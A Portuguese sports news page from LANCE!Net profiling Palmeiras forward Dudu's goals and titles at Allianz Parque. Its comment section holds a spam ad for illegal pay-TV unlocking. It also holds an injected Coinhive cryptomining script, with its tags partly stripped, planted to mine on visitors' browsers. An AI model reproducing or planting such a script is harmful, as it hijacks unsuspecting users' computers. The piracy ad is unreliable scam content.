'Dono da casa': Dudu constrói rota para a idolatria no Allianz Parque

25/1/2018 09:30

'Dono da casa': Dudu constrói rota para a idolatria no Allianz Parque

Após recusar oferta da China, Dudu comandará o Verdão contra o Red Bull, nesta quinta-feira. Jogo será no palco em que o atacante viveu seus melhores momentos pelo clube

'Dono da casa': Dudu constrói rota para a idolatria no Allianz Parque

Com dois títulos no currículo, um deles com grande atuação na final e outro como capitão, Dudu já está na história do Palmeiras. Mas o atacante quer mais: ele diz que ainda precisa de mais conquistas para se considerar um ídolo do clube. Tempo não vai faltar. Nesta semana, o camisa 7 recusou uma oferta exorbitante do Changchun Yatai, da China, e avisou que vai ficar "em casa". No Allianz Parque, palco do jogo contra o Red Bull, às 21h desta quinta, dá para dizer que ele é o dono da casa. Os momentos mais marcantes de sua trajetória no Verdão foram lá.







ARTILHEIRO DA ARENA - Dudu é o maior artilheiro da história do Allianz Parque, com 22 gols marcados. O vice-líder é Gabriel Jesus, com 13 gols (dois pela Seleção Brasileira). Rafael Marques (12 gols), Cristaldo (11), Leandro Pereira e Willian (ambos com 7) vêm na sequência.



APRESENTAÇÃO ESPECIAL - A relação de Dudu com o Allianz Parque começou antes mesmo de seu primeiro jogo no estádio. Ele foi apresentado no estádio em 17 de janeiro de 2015, pouco depois do "chapéu" que Alexandre Mattos deu no Corinthians e no São Paulo, que disputavam a contratação dele.



CONTATO COM A TORCIDA E PROMESSA: O primeiro contato de Dudu com a torcida do Palmeiras foi logo depois da apresentação, pouco antes do amistoso entre Palmeiras e Shandong Luneng (CHN) no Allianz Parque. Naquele dia, o atacante foi questionado sobre a chance de comemorar um gol "tirando o chapéu" e fez uma pro promessa: "Se for para deixar a torcida feliz, espero fazer gols contra o São Paulo e o Corinthians para fazer essa comemoração". Ele cumpriu a palavra em 2016, ao marcar o gol da vitória por 1 a 0 sobre o Corinthians pelo Paulistão. Esse jogo foi no Pacaembu, em um de seus raros momentos marcantes longe da arena alviverde.



A ESTREIA - O primeiro jogo de Dudu pelo Verdão, como não poderia deixar de ser, aconteceu no Allianz Parque. Ele participou dos 45 minutos finais da vitória por 3 a 2 sobre o Red Bull, em amistoso de pré-temporada. O primeiro jogo oficial também foi na arena, mas com derrota por 1 a 0 para a Ponte Preta pelo Paulistão. Só o primeiro gol pelo clube é que foi longe de casa, contra o São Bento, em Sorocaba, também pelo Estadual de 2015.



NO ALLIANZ, ELE COMEÇOU A VIRAR O REI DOS CLÁSSICOS - O primeiro dos sete gols que Dudu marcou em clássicos saiu no Allianz Parque. Foi no empate por 3 a 3 com o Corinthians pelo Brasileirão de 2015. Era o nono clássico dele pelo Verdão. Depois disso, ele marcou mais um gol contra o Corinthians (no Pacaembu), dois no São Paulo (um no Allianz e outro no Pacaembu) e três no Santos (dois no Allianz e um na Vila Belmiro). Nenhum jogador do elenco do Palmeiras marcou mais vezes contra os rivais.



O GOL MAIS BONITO - Dudu marcou o maior de seus golaços no Allianz Parque. E foi em um clássico. Pelo Paulistão de 2017, ele aproveitou um vacilo da defesa do São Paulo, chutou quase do meio de campo e encobriu o goleiro Denis. "Acho que é o gol mais bonito da minha carreira. Meus gols são todos de dentro da área, acho que nunca tinha feito um de longe", disse.



TEVE PLACA - Dudu ganhou uma placa do presidente Maurício Galiotte pelo golaço no Choque-Rei. A homenagem foi feita no Allianz Parque antes da vitória por 4 a 0 sobre o Vasco, pela primeira rodada do Brasileirão do ano passado.



A TORCIDA GOSTOU - Um dos lances marcantes de Dudu no Allianz Parque foi o encontrão involuntário que derrubou Vanderlei Luxemburgo, durante uma vitória por 2 a 1 sobre o Cruzeiro. Parte da torcida do Palmeiras vibrou com a cena e irritou o treinador. Dudu pediu desculpas.



O PRIMEIRO TÍTULO - Dudu conquistou sua primeira taça no Palmeiras em 2 de dezembro de 2015: a Copa do Brasil. Ele teve atuação de gala na decisão e marcou os dois gols da vitória por 2 a 1 sobre o Santos. O Verdão levou o título nos pênaltis.



O SEGUNDO TÍTULO - A segunda taça de Dudu no Palmeiras, a do Brasileirão de 2016, também foi conquistada e erguida no Allianz Parque. O jogo do título foi a vitória por 1 a 0 sobre a Chapecoense. Capitão do time - posto que ganhou de Cuca naquele ano e mantém até hoje -, o camisa 7 foi o responsável por receber o troféu.



HOJE TEM MAIS? Se marcar um gol nesta quinta-feira, Dudu vai se isolar como segundo maior artilheiro do Palmeiras no século. Neste momento ele está empatado com Valdivia, ambos com 41 gols. O líder é Vagner Love, com 54.



VEJA TAMBÉM
- Endrick fala sobre transferência para o Real Madrid e metas pessoais definidas.
- Abel transforma carreira de Endrick no Palmeiras com conselho decisivo: "Inesquecível e motivador
- Palmeiras retorna ao palco da última conquista da Libertadores para enfrentar Liverpool-URU.





6294 visitas - Fonte: LANCE!Net

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

Dudu já é LENDA noPalmeiras, só o que ele fez na final da COPA DO BRASIL 2015 contra o Santos na final já fez história. Valeu DUDU. Obrigado.

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Libertadores

Qui - 19:00 - Centenario -
X
Liverpool Montevideo
Palmeiras

Brasileiro

Dom - 18:30 - Arena Pantanal
0 X 2
Cuiaba
Palmeiras